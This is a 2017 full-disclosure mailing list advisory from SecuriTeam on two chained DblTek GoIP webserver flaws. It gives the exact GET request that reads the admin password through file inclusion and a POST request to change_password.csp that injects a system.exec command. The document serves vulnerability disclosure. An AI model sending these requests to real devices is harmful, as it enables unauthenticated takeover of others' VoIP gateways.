[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] =?utf-8?q?SSD_Advisory_=E2=80=93_DblTek_Multiple_Vulnerabili?= =?utf-8?q?ties?=
From:       Maor Shwartz <maors () beyondsecurity ! com>
Date:       2017-11-21 12:44:59
Message-ID: CAAnZqX_gcOO2NizE8FQ+_F2ivB2SEfBQDQW5i4TEwHWTBufuYA () mail ! gmail ! com
[Download RAW message or body]

SSD Advisory – DblTek Multiple Vulnerabilities

Full report: https://blogs.securiteam.com/index.php/archives/3437
Twitter: @SecuriTeam_SSD
Weibo: SecuriTeam_SSD

Vulnerabilities summary
The following advisory describes 2 (two) vulnerabilities found in DblTek
webserver.

DBL is "specialized in VoIP products, especially GoIPs. We design, develop,
manufacture, and sell our products directly and via distributors to
customers. Our GoIP models now cover 1, 4, 8, 16, and 32-channel in order
to meet the wide range of market demands. All our products are priced very
attractively and probably the lowest in the market. Because of the price
and performance, GoIPs have been widely adopted by system integrators, VoIP
service providers, and many other business and individual users."

The vulnerabilities found are:

Pre-authentication Information Disclosure
Command Execution

It is possible to combine the 2 vulnerabilities and gain unauthenticated
remote command execution.

Credit
An independent security researcher has reported this vulnerability to
Beyond Security's SecuriTeam Secure Disclosure program

Vendor response
DblTek has released patches to address those vulnerabilities.

Vulnerabilities details
User controlled input is not sufficiently sanitized and can trigger Local
File Inclusion.

By sending GET request to /dev/mtdblock/5 an attacker can download the
configuration file that contain admin password:


===

GET /default/en_US/frame.html?content=/dev/mtdblock/5

===

After we got the admin password, we can send a POST request to
change_password.csp and trigget the second vulnerability.

User controlled input is not sufficiently sanitized when pass to
change_password.csp. An attacker can inject script containing malicious
commands in a configuration variable and execute it.

===

POST /default/en_US/change_password.csp

Content-Type: application/x-www-form-urlencoded

Authorization: Basic ###BASE64("admin", ###LEAKED_PASSWORD###)###

level=user&user_level_enable=on&passwd=<%%25call system.exec:
###MALICIOUS_COMMAND###>

===


--
Thanks
Maor Shwartz
Beyond Security
GPG Key ID: 6D273779F52A9FC2

["=?UTF-8?Q?SSD_Advisory_=E2=80=93_DblTek_Multiple_Vulnerabilities_=E2=80=93_Secur?=
	=?UTF-8?Q?iTeam_Blogs=2Epdf?=" (application/pdf)]

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic